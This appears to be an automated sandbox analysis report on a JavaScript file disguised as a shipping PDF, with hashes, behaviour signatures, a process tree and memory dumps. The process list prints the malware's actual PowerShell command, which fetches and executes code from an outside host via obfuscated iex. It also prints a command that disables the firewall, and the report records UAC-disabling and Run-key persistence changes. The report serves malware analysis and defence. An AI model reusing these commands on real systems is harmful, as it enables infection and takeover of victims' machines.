Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
17-01-2024 13:40
Static task
static1
Behavioral task
behavioral1
Sample
BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
Resource
win10v2004-20231222-en
General
-
Target
BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 11 468 powershell.exe 13 468 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 87 api.ipify.org 89 api.ipify.org 99 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 468 set thread context of 5112 468 powershell.exe RegSvcs.exe PID 468 set thread context of 3576 468 powershell.exe RegSvcs.exe PID 468 set thread context of 2212 468 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exeRegSvcs.exepid process 468 powershell.exe 468 powershell.exe 468 powershell.exe 468 powershell.exe 468 powershell.exe 468 powershell.exe 468 powershell.exe 5112 RegSvcs.exe 5112 RegSvcs.exe 5112 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeRegSvcs.exedw20.exedw20.exedescription pid process Token: SeDebugPrivilege 468 powershell.exe Token: SeDebugPrivilege 5112 RegSvcs.exe Token: SeRestorePrivilege 4980 dw20.exe Token: SeBackupPrivilege 4980 dw20.exe Token: SeBackupPrivilege 4980 dw20.exe Token: SeBackupPrivilege 4980 dw20.exe Token: SeBackupPrivilege 4980 dw20.exe Token: SeBackupPrivilege 1296 dw20.exe Token: SeBackupPrivilege 1296 dw20.exe Token: SeIncreaseQuotaPrivilege 468 powershell.exe Token: SeSecurityPrivilege 468 powershell.exe Token: SeTakeOwnershipPrivilege 468 powershell.exe Token: SeLoadDriverPrivilege 468 powershell.exe Token: SeSystemProfilePrivilege 468 powershell.exe Token: SeSystemtimePrivilege 468 powershell.exe Token: SeProfSingleProcessPrivilege 468 powershell.exe Token: SeIncBasePriorityPrivilege 468 powershell.exe Token: SeCreatePagefilePrivilege 468 powershell.exe Token: SeBackupPrivilege 468 powershell.exe Token: SeRestorePrivilege 468 powershell.exe Token: SeShutdownPrivilege 468 powershell.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeSystemEnvironmentPrivilege 468 powershell.exe Token: SeRemoteShutdownPrivilege 468 powershell.exe Token: SeUndockPrivilege 468 powershell.exe Token: SeManageVolumePrivilege 468 powershell.exe Token: 33 468 powershell.exe Token: 34 468 powershell.exe Token: 35 468 powershell.exe Token: 36 468 powershell.exe Token: SeIncreaseQuotaPrivilege 468 powershell.exe Token: SeSecurityPrivilege 468 powershell.exe Token: SeTakeOwnershipPrivilege 468 powershell.exe Token: SeLoadDriverPrivilege 468 powershell.exe Token: SeSystemProfilePrivilege 468 powershell.exe Token: SeSystemtimePrivilege 468 powershell.exe Token: SeProfSingleProcessPrivilege 468 powershell.exe Token: SeIncBasePriorityPrivilege 468 powershell.exe Token: SeCreatePagefilePrivilege 468 powershell.exe Token: SeBackupPrivilege 468 powershell.exe Token: SeRestorePrivilege 468 powershell.exe Token: SeShutdownPrivilege 468 powershell.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeSystemEnvironmentPrivilege 468 powershell.exe Token: SeRemoteShutdownPrivilege 468 powershell.exe Token: SeUndockPrivilege 468 powershell.exe Token: SeManageVolumePrivilege 468 powershell.exe Token: 33 468 powershell.exe Token: 34 468 powershell.exe Token: 35 468 powershell.exe Token: 36 468 powershell.exe Token: SeIncreaseQuotaPrivilege 468 powershell.exe Token: SeSecurityPrivilege 468 powershell.exe Token: SeTakeOwnershipPrivilege 468 powershell.exe Token: SeLoadDriverPrivilege 468 powershell.exe Token: SeSystemProfilePrivilege 468 powershell.exe Token: SeSystemtimePrivilege 468 powershell.exe Token: SeProfSingleProcessPrivilege 468 powershell.exe Token: SeIncBasePriorityPrivilege 468 powershell.exe Token: SeCreatePagefilePrivilege 468 powershell.exe Token: SeBackupPrivilege 468 powershell.exe Token: SeRestorePrivilege 468 powershell.exe Token: SeShutdownPrivilege 468 powershell.exe Token: SeDebugPrivilege 468 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeRegSvcs.exeMsbuild.exedescription pid process target process PID 808 wrote to memory of 468 808 wscript.exe powershell.exe PID 808 wrote to memory of 468 808 wscript.exe powershell.exe PID 468 wrote to memory of 3416 468 powershell.exe csc.exe PID 468 wrote to memory of 3416 468 powershell.exe csc.exe PID 3416 wrote to memory of 3532 3416 csc.exe cvtres.exe PID 3416 wrote to memory of 3532 3416 csc.exe cvtres.exe PID 468 wrote to memory of 3660 468 powershell.exe netsh.exe PID 468 wrote to memory of 3660 468 powershell.exe netsh.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 5112 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 468 wrote to memory of 3576 468 powershell.exe RegSvcs.exe PID 3576 wrote to memory of 4980 3576 RegSvcs.exe dw20.exe PID 3576 wrote to memory of 4980 3576 RegSvcs.exe dw20.exe PID 3576 wrote to memory of 4980 3576 RegSvcs.exe dw20.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 468 wrote to memory of 2212 468 powershell.exe Msbuild.exe PID 2212 wrote to memory of 1296 2212 Msbuild.exe dw20.exe PID 2212 wrote to memory of 1296 2212 Msbuild.exe dw20.exe PID 2212 wrote to memory of 1296 2212 Msbuild.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5709.tmp" "c:\Users\Admin\AppData\Local\Temp\vyldccjb\CSC2BB580203AA3408988EC8A881C8446C0.TMP"4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7884⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES5709.tmpFilesize
1KB
MD55b3419c0979d27e4beb827496a93fafd
SHA1a03dfec9e6c6db1a651436360a607e051bae3606
SHA25689855031dd5a7e7bdea49721843f8a24ec21e421b828e6c69c7511aff2f856c1
SHA51245130e779516b03552053d93eaae472199e952938a15ed5716c3a2c90ba694881f7726c572b73038c63793099a578d71065a4abdb43cdd7d65248a291a26d030
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezbxlefq.oxw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.dllFilesize
3KB
MD50d70da0e83a93ae43b5757ca1cd562c4
SHA11dc9b59d0c7cf1c3d873dd6cfbb295dc4527a262
SHA256a3615a476371dca286a38f4fc7c1aef1f345cb22406c6760d6b5c6a0f226101d
SHA5126e23d356575c74082475be07181acbed60aeb482ad3dab6908d66345431e7d8f7370b5b939b5c6fff4616df309a04a2724337109143d8c052b4e77aadfcedda0
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\CSC2BB580203AA3408988EC8A881C8446C0.TMPFilesize
652B
MD5237a7c4cf8d71813e2e134034ffddee2
SHA14e0ab37ddcfb65366dc6fcb487985f56f6255d7c
SHA25668a7fb4764f4db727906780db134cc8f5789a0504c50b1dd9fafd2ec8ce997b3
SHA5125ec8ff827fa32d8a62b79d7194166aec84e8074e1667e404dfbe12e6a73f8721218591b7717c6e4bd78ec8c234acf15eb9644eebed6f5366c901a9ddd96be7e9
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.0.csFilesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
\??\c:\Users\Admin\AppData\Local\Temp\vyldccjb\vyldccjb.cmdlineFilesize
369B
MD5e8c4240e48639ab212ce40f59c675c7a
SHA1e5ade49fc041c500ea5f419d206af4bb0892c93a
SHA256cec74affea740b62d4fbba94be2a185c63233afdc8bc39e5ffac5dee82fa2b2f
SHA512915e421d95c93dff9243875037c5b5e3b56101eb15be36112ba3b648c3d60c068f154381cff8a0619adff6a3d6cda23bf4f4b95e75a85eb9d4f25383bda7d8de
-
memory/468-29-0x0000013FEC5F0000-0x0000013FEC5F8000-memory.dmpFilesize
32KB
-
memory/468-10-0x00007FFB92A60000-0x00007FFB93521000-memory.dmpFilesize
10.8MB
-
memory/468-14-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-13-0x0000013FECA30000-0x0000013FECBF2000-memory.dmpFilesize
1.8MB
-
memory/468-57-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-12-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-11-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-15-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-31-0x0000013FD22E0000-0x0000013FD22EE000-memory.dmpFilesize
56KB
-
memory/468-32-0x0000013FD2320000-0x0000013FD233A000-memory.dmpFilesize
104KB
-
memory/468-33-0x00007FFB92A60000-0x00007FFB93521000-memory.dmpFilesize
10.8MB
-
memory/468-35-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-72-0x00007FFB92A60000-0x00007FFB93521000-memory.dmpFilesize
10.8MB
-
memory/468-68-0x0000013FEBFC0000-0x0000013FEBFD0000-memory.dmpFilesize
64KB
-
memory/468-5-0x0000013FEC440000-0x0000013FEC462000-memory.dmpFilesize
136KB
-
memory/2212-58-0x000000006FEA0000-0x0000000070451000-memory.dmpFilesize
5.7MB
-
memory/2212-67-0x000000006FEA0000-0x0000000070451000-memory.dmpFilesize
5.7MB
-
memory/3576-45-0x0000000000400000-0x000000000048C000-memory.dmpFilesize
560KB
-
memory/3576-47-0x0000000001930000-0x0000000001940000-memory.dmpFilesize
64KB
-
memory/3576-46-0x0000000070590000-0x0000000070B41000-memory.dmpFilesize
5.7MB
-
memory/3576-48-0x0000000070590000-0x0000000070B41000-memory.dmpFilesize
5.7MB
-
memory/3576-55-0x0000000070590000-0x0000000070B41000-memory.dmpFilesize
5.7MB
-
memory/3728-110-0x0000012DF0BB0000-0x0000012DF0BB1000-memory.dmpFilesize
4KB
-
memory/3728-109-0x0000012DF0AA0000-0x0000012DF0AA1000-memory.dmpFilesize
4KB
-
memory/3728-108-0x0000012DF0AA0000-0x0000012DF0AA1000-memory.dmpFilesize
4KB
-
memory/3728-106-0x0000012DF0A70000-0x0000012DF0A71000-memory.dmpFilesize
4KB
-
memory/3728-90-0x0000012DE8740000-0x0000012DE8750000-memory.dmpFilesize
64KB
-
memory/5112-39-0x0000000004EA0000-0x0000000004F06000-memory.dmpFilesize
408KB
-
memory/5112-38-0x00000000053E0000-0x0000000005984000-memory.dmpFilesize
5.6MB
-
memory/5112-36-0x0000000000800000-0x000000000088C000-memory.dmpFilesize
560KB
-
memory/5112-69-0x00000000068B0000-0x00000000068BA000-memory.dmpFilesize
40KB
-
memory/5112-37-0x0000000074930000-0x00000000750E0000-memory.dmpFilesize
7.7MB
-
memory/5112-73-0x0000000074930000-0x00000000750E0000-memory.dmpFilesize
7.7MB
-
memory/5112-42-0x00000000050D0000-0x0000000005162000-memory.dmpFilesize
584KB
-
memory/5112-44-0x0000000005990000-0x0000000005B52000-memory.dmpFilesize
1.8MB
-
memory/5112-43-0x0000000004F10000-0x0000000004F60000-memory.dmpFilesize
320KB
-
memory/5112-40-0x00000000050C0000-0x00000000050D0000-memory.dmpFilesize
64KB
-
memory/5112-41-0x0000000004FB0000-0x000000000504C000-memory.dmpFilesize
624KB